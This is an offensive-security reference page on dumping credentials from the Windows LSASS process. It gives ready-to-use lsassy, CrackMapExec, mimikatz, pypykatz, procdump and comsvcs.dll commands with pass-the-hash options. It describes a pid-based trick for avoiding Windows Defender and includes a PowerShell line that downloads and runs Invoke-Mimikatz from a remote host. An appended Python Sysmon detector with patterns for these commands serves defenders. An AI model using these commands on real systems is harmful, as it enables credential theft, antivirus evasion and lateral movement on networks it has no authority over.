LSASS secrets
MITRE ATT&CK™ Sub-technique T1003.001

Theory

The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. It verifies users logging in, handles password changes and creates access tokens. Those operations lead to the storage of credential material in the process memory of LSASS. Administrative rights are all that is needed to harvest this material, either locally or remotely.

Practice

Lsassy (Python) can be used to remotely extract credentials from LSASS on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.

# With pass-the-hash (NTLM)
lsassy -u $USER -H $NThash $TARGETS

# With plaintext credentials
lsassy -d $DOMAIN -u $USER -p $PASSWORD $TARGETS

# With pass-the-ticket (Kerberos)
lsassy -k $TARGETS

# CrackMapExec module examples
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
crackmapexec smb $TARGETS -k -M lsassy
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
Mimikatz can be used locally to extract credentials from lsass's process memory, or offline (i.e. on another machine) to analyze a memory dump (dumped with ProcDump for example).

# (Locally) extract credentials from LSASS process memory
sekurlsa::logonpasswords

# (Offline) analyze a memory dump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
For Windows 2000, a special version of mimikatz called mimilove can be used.
Pypykatz (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with ProcDump for example).

pypykatz lsa minidump lsass.dmp
The legitimate Sysinternals tool ProcDump can be used to dump lsass's process memory.

procdump -accepteula -ma lsass lsass.dmp
Windows Defender is triggered when a memory dump of lsass is taken by name, and it quickly deletes the dump. Using lsass's process identifier (pid) instead of its name "bypasses" that.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
procdump -accepteula -ma $lsass_pid lsass.dmp
Once the memory dump is finished, it can be analyzed with mimikatz (Windows) or pypykatz (Python, cross-platform).
The native comsvcs.dll DLL found in C:\Windows\System32 can be used with rundll32 to dump LSASS's process memory.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full
PowerSploit's exfiltration script Invoke-Mimikatz (PowerShell) can be used to extract credential material from LSASS's process memory.

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
Recovered credential material can be either plaintext passwords or NT hashes usable with pass-the-hash (depending on the context).
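From the defender's side, every method above ends with a process opening lsass.exe with read access, which is exactly what Sysmon Event ID 10 (ProcessAccess) records, and the pid trick only defeats name-based matching on command lines. The following detection logic is an added example (not part of the original page); it runs over constructed Sysmon-style records, and the allowlist of legitimate lsass readers is an assumption to be tuned per environment.

```python
import re

# Win32 access rights: MiniDumpWriteDump reads the target's memory, so a dump
# of lsass.exe always needs PROCESS_VM_READ (0x10) in the granted access mask.
PROCESS_VM_READ = 0x0010

# Assumption: processes allowed to read LSASS memory (tune per environment).
ALLOWED_SOURCES = {"msmpeng.exe"}

# Constructed records in the shape of Sysmon Event ID 10 (ProcessAccess)
# fields, flattened to key=value pairs for this example.
SAMPLE_EVENTS = [
    "SourceImage=C:\\Windows\\System32\\svchost.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1000",
    "SourceImage=C:\\ProgramData\\Microsoft\\Windows Defender\\MsMpEng.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1010",
    "SourceImage=C:\\Tools\\procdump.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1fffff",
    "SourceImage=C:\\Windows\\System32\\rundll32.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1410",
    "SourceImage=C:\\Tools\\procdump.exe|TargetImage=C:\\Windows\\System32\\notepad.exe|GrantedAccess=0x1fffff",
]

# Command-line patterns (Sysmon Event ID 1 / Security 4688) for the dump
# methods on this page. Name-based, so renamed binaries or output files evade it.
DUMP_CMDLINE_PATTERNS = [
    re.compile(r"comsvcs\.dll.*minidump", re.I),    # rundll32 comsvcs.dll, MiniDump
    re.compile(r"procdump.*\s-ma\s.*lsass", re.I),  # procdump -ma lsass / -ma <pid> lsass.dmp
    re.compile(r"sekurlsa::|invoke-mimikatz", re.I),
]

def parse_event(line):
    return dict(pair.split("=", 1) for pair in line.split("|"))

def image_name(path):
    return path.lower().rsplit("\\", 1)[-1]

def is_lsass_memory_read(event):
    """True when a non-allowlisted process obtained read access to lsass.exe."""
    if image_name(event["TargetImage"]) != "lsass.exe":
        return False
    if not int(event["GrantedAccess"], 16) & PROCESS_VM_READ:
        return False  # e.g. 0x1000 is PROCESS_QUERY_LIMITED_INFORMATION only
    return image_name(event["SourceImage"]) not in ALLOWED_SOURCES

def find_lsass_readers(lines):
    """Image names of processes that read LSASS memory in a batch of events."""
    events = (parse_event(line) for line in lines)
    return [image_name(e["SourceImage"]) for e in events if is_lsass_memory_read(e)]

def is_dump_command_line(cmdline):
    """Weaker, name-based companion check over process creation command lines."""
    return any(p.search(cmdline) for p in DUMP_CMDLINE_PATTERNS)
```

On the sample batch, only procdump.exe and rundll32.exe are reported: the svchost record lacks PROCESS_VM_READ and the Defender engine is allowlisted.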

References

Extract credentials from lsass remotely (hackndo)